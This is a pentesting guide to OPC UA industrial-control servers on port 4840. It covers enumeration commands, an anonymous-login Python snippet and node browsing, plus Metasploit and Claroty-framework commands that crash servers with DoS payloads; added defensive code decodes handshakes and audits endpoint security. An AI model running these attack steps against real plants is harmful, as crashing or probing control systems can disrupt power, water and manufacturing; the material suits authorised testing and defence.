OPC UA - PORT 4840

Basic info

  • A machine-to-machine communication protocol for industrial control systems (ICS).

  • Standard port: 4840/TCP.

  • Used in:

    • Manufacturing lines

    • Power & energy networks

    • Oil & gas

    • Water plants

  • Provides structured data exchange between PLCs, sensors, and control software.

For attackers, this is gold: a single OPC UA server can expose device data, configurations, and control endpoints.


Enumeration

Nmap Scan

nmap -sV -p 4840 <target>

Output:

4840/tcp open  opc-ua  OPC UA TCP Protocol
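What Nmap is fingerprinting here is the OPC UA TCP handshake: the client opens the connection with a Hello (HEL) message naming the endpoint URL it wants, and the server answers with an Acknowledge (ACK) carrying its buffer limits. The decoder below is an added example, not from the original page or from Nmap; it follows the OPC UA Part 6 binary layout so a network sensor can log which endpoint a client asked for on any port and reject malformed or oversized handshakes. The byte strings, the hostname plc-sim.lab.example and the buffer sizes are constructed for the example.

```python
"""Decode OPC UA TCP Hello (HEL) / Acknowledge (ACK) messages.

Added example, not from the original page or from Nmap. Field layout follows
OPC UA Part 6 (binary transport); the sample bytes below are constructed.
"""
import struct

# Message header: 3-byte type ("HEL", "ACK", "ERR", "MSG", ...), 1-byte chunk
# type ('F' = final), then the total message size; everything little-endian.
HEADER = struct.Struct("<3sBI")
# HEL body before the endpoint URL; an ACK body has exactly these five fields.
BODY = struct.Struct("<IIIII")
MAX_ENDPOINT_URL = 4096   # Part 6 caps EndpointUrl at 4096 bytes


def _decode_string(buf: bytes, off: int):
    """OPC UA String: Int32 length (-1 = null) followed by UTF-8 bytes."""
    (n,) = struct.unpack_from("<i", buf, off)
    off += 4
    if n == -1:
        return None, off
    if n < 0 or off + n > len(buf):
        raise ValueError("string length runs past end of message")
    return buf[off:off + n].decode("utf-8"), off + n


def decode_handshake(buf: bytes) -> dict:
    """Return the fields of a HEL or ACK message, validating sizes first."""
    if len(buf) < HEADER.size:
        raise ValueError("truncated header")
    mtype, chunk, size = HEADER.unpack_from(buf, 0)
    mtype = mtype.decode("ascii")
    if mtype not in ("HEL", "ACK") or chunk != ord("F"):
        raise ValueError(f"not a handshake message: {mtype!r}")
    if size != len(buf):
        raise ValueError(f"header says {size} bytes, got {len(buf)}")
    version, recv_buf, send_buf, max_msg, max_chunks = BODY.unpack_from(buf, HEADER.size)
    msg = {
        "type": mtype, "version": version,
        "receive_buffer": recv_buf, "send_buffer": send_buf,
        "max_message_size": max_msg, "max_chunk_count": max_chunks,
    }
    if mtype == "HEL":
        url, end = _decode_string(buf, HEADER.size + BODY.size)
        if url is not None and len(url.encode("utf-8")) > MAX_ENDPOINT_URL:
            raise ValueError("EndpointUrl exceeds 4096 bytes")
        if end != len(buf):
            raise ValueError("trailing bytes after EndpointUrl")
        msg["endpoint_url"] = url
    return msg


def is_valid_handshake(buf: bytes) -> bool:
    """Boolean wrapper a sensor can use to drop anything that does not parse."""
    try:
        decode_handshake(buf)
        return True
    except ValueError:
        return False


def _encode_string(s: str) -> bytes:
    b = s.encode("utf-8")
    return struct.pack("<i", len(b)) + b


# Constructed capture: the HEL a client sends to plc-sim.lab.example:4840
# and the ACK the server returns (hostname and buffer sizes are made up).
_hel_body = BODY.pack(0, 65535, 65535, 16 * 1024 * 1024, 0) + \
    _encode_string("opc.tcp://plc-sim.lab.example:4840/")
SAMPLE_HEL = HEADER.pack(b"HEL", ord("F"), HEADER.size + len(_hel_body)) + _hel_body

_ack_body = BODY.pack(0, 65535, 65535, 16 * 1024 * 1024, 0)
SAMPLE_ACK = HEADER.pack(b"ACK", ord("F"), HEADER.size + len(_ack_body)) + _ack_body

if __name__ == "__main__":
    print(decode_handshake(SAMPLE_HEL))
    print(decode_handshake(SAMPLE_ACK))
```

The size check against the header and the 4096-byte URL limit are the two validations a server is expected to perform before it trusts anything else in the message; a sensor that applies the same checks can flag clients whose Hello does not look like a normal OPC UA stack produced it.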

Banner Grab & Enumeration

Use the opcua-info NSE script:

nmap -p 4840 --script opcua-info <target>

This extracts:

  • Server application name

  • Security policies supported (None, Basic256, etc.)

  • Endpoints & available services

To reveal security issues in OPC UA servers, scan them with OpalOPC:

opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port

Shodan / Censys

Search for:

port:4840 opc ua

Exploitation

Once you find an OPC UA server, you have multiple attack routes:

1. No Authentication (Anonymous Login)

Many deployments allow anonymous access. Use the Python opcua client:

from opcua import Client  # python-opcua (pip install opcua)

# No set_user() / set_password() call, so the client requests an anonymous session
client = Client("opc.tcp://<target>:4840")
client.connect()
print("Connected:", client.get_endpoints())
client.disconnect()
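The security policies and user-token types listed by the enumeration step above, and the anonymous-login check in this step, are exactly what a defender wants rated automatically across every endpoint a server advertises. The following is an added example, not from the original page or from any tool it names: it audits plain dicts shaped like OPC UA EndpointDescription and UserTokenPolicy fields, so it runs offline, and with python-opcua you would fill the same dicts from the result of client.get_endpoints(). The sample endpoints, the hostname plc-sim.lab.example and the severity labels are constructed for the example.

```python
"""Rate the endpoints an OPC UA server advertises in GetEndpoints.

Added example, not from the original page or from any tool it names. Works on
plain dicts shaped like OPC UA EndpointDescription / UserTokenPolicy fields so
it runs offline; the sample endpoints at the bottom are constructed.
"""
from dataclasses import dataclass

POLICY_PREFIX = "http://opcfoundation.org/UA/SecurityPolicy#"
# Basic128Rsa15 and Basic256 are deprecated (SHA-1, RSA PKCS#1 v1.5);
# these three are the policies the OPC Foundation still recommends.
STRONG_POLICIES = {"Basic256Sha256", "Aes128_Sha256_RsaOaep", "Aes256_Sha256_RsaPss"}
DEPRECATED_POLICIES = {"Basic128Rsa15", "Basic256"}

# MessageSecurityMode and UserTokenType enumeration values (OPC UA Part 4)
MODE_NONE, MODE_SIGN, MODE_SIGN_ENCRYPT = 1, 2, 3
TOKEN_ANONYMOUS, TOKEN_USERNAME, TOKEN_CERTIFICATE, TOKEN_ISSUED = 0, 1, 2, 3


@dataclass
class Finding:
    endpoint: str
    severity: str   # "high", "medium" or "info"
    message: str


def policy_name(uri: str) -> str:
    """'http://opcfoundation.org/UA/SecurityPolicy#None' -> 'None'."""
    return uri[len(POLICY_PREFIX):] if uri.startswith(POLICY_PREFIX) else uri


def audit_endpoint(ep: dict) -> list:
    """Findings for one endpoint: channel protection first, then user tokens."""
    url, mode = ep["EndpointUrl"], ep["SecurityMode"]
    policy = policy_name(ep["SecurityPolicyUri"])
    findings = []

    if policy == "None" or mode == MODE_NONE:
        findings.append(Finding(url, "high", "channel is neither signed nor encrypted"))
    elif policy in DEPRECATED_POLICIES:
        findings.append(Finding(url, "medium", f"deprecated security policy {policy}"))
    elif mode == MODE_SIGN:
        findings.append(Finding(url, "medium", "messages signed but not encrypted"))
    elif policy not in STRONG_POLICIES:
        findings.append(Finding(url, "info", f"unrecognised policy {policy}, review manually"))

    channel_encrypted = mode == MODE_SIGN_ENCRYPT and policy != "None"
    for tok in ep.get("UserIdentityTokens", []):
        if tok["TokenType"] == TOKEN_ANONYMOUS:
            findings.append(Finding(url, "high", "anonymous user token accepted"))
        elif tok["TokenType"] == TOKEN_USERNAME:
            # A null token policy means "use the endpoint's policy". If that is
            # None and the channel is not encrypted, the password goes in clear.
            tok_policy = policy_name(tok.get("SecurityPolicyUri") or ep["SecurityPolicyUri"])
            if tok_policy == "None" and not channel_encrypted:
                findings.append(Finding(url, "high", "password token would be sent in cleartext"))
    return findings


def audit_server(endpoints: list) -> dict:
    """Counts per severity plus the full finding list for a GetEndpoints result."""
    findings = [f for ep in endpoints for f in audit_endpoint(ep)]
    summary = {sev: sum(1 for f in findings if f.severity == sev)
               for sev in ("high", "medium", "info")}
    summary["findings"] = findings
    return summary


# Constructed sample: what a lab PLC simulator might advertise (hostname made up).
SAMPLE_ENDPOINTS = [
    {"EndpointUrl": "opc.tcp://plc-sim.lab.example:4840/",
     "SecurityPolicyUri": POLICY_PREFIX + "None", "SecurityMode": MODE_NONE,
     "UserIdentityTokens": [
         {"PolicyId": "anonymous", "TokenType": TOKEN_ANONYMOUS},
         {"PolicyId": "username", "TokenType": TOKEN_USERNAME, "SecurityPolicyUri": None}]},
    {"EndpointUrl": "opc.tcp://plc-sim.lab.example:4840/",
     "SecurityPolicyUri": POLICY_PREFIX + "Basic128Rsa15", "SecurityMode": MODE_SIGN_ENCRYPT,
     "UserIdentityTokens": [{"PolicyId": "cert", "TokenType": TOKEN_CERTIFICATE}]},
    {"EndpointUrl": "opc.tcp://plc-sim.lab.example:4840/",
     "SecurityPolicyUri": POLICY_PREFIX + "Basic256Sha256", "SecurityMode": MODE_SIGN_ENCRYPT,
     "UserIdentityTokens": [
         {"PolicyId": "username", "TokenType": TOKEN_USERNAME, "SecurityPolicyUri": None}]},
]

if __name__ == "__main__":
    for f in audit_server(SAMPLE_ENDPOINTS)["findings"]:
        print(f"[{f.severity}] {f.endpoint}: {f.message}")
```

Run against the constructed sample, the first endpoint produces three high findings (unprotected channel, anonymous token, cleartext password token), the second a single medium for the deprecated policy, and the third none, which is the posture a hardened server should show: only SignAndEncrypt endpoints on a current policy, with no anonymous token policy.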

2. Information Disclosure

OPC UA servers expose tags, variables, and node data. This can reveal:

  • Factory layout

  • Device models & firmware versions

  • Process values (temperatures, flow rates, etc.)

Example Python snippet:

# 'client' is the connected Client from the anonymous-login snippet above
root = client.get_root_node()
print("Root children:", root.get_children())

3. Vulnerabilities (CVE-2018-4840 & more)

Poor implementations of OPC UA are vulnerable to buffer overflows and denial of service.

Metasploit has a module:

use auxiliary/dos/opcua/opcua_extensionobject_bof
set RHOSTS <target>
set RPORT 4840
run

This can crash the service or prove exploitability in vulnerable stacks. With ROP chains, it becomes RCE.


Automated Tools

Claroty’s OPC UA Exploit Framework is a research toolkit for fuzzing, testing, and exploiting OPC UA servers/clients. It was the backbone of Team82’s discovery of dozens of OPC UA vulnerabilities.

Installation & How-to guide

# Clone the repo
git clone https://github.com/claroty/opcua-exploit-framework.git
cd opcua-exploit-framework

# Install requirements
pip install -r requirements.txt

⚠️ Make sure you’re running Python 3.8+ and have pip installed.

The framework has four modules:

  • sanity → Simple probes

  • attacks → Exploit payloads

  • corpus → Saved fuzz cases

  • server → Fake OPC UA server for testing

1. Run a Sanity Test (check target is alive)

python3 main.py sanity --target opc.tcp://192.168.1.100:4840

This checks if the OPC UA service is responding.

2. Enumerate Nodes

python3 main.py sanity read-nodes --target opc.tcp://192.168.1.100:4840

Useful for info-gathering on exposed objects.

3. Launch an Attack

Example: Remote Stack Overflow (DoS)

python3 main.py attacks dos-basic --target opc.tcp://192.168.1.100:4840

If the server crashes → it’s vulnerable.

4. Reuse Payloads (Corpus)

python3 main.py corpus --payload payloads/bad_integer.bin --target opc.tcp://192.168.1.100:4840

This lets you replay fuzzing payloads that previously triggered bugs.

5. Use the Built-in Test Server

python3 main.py server --port 4840
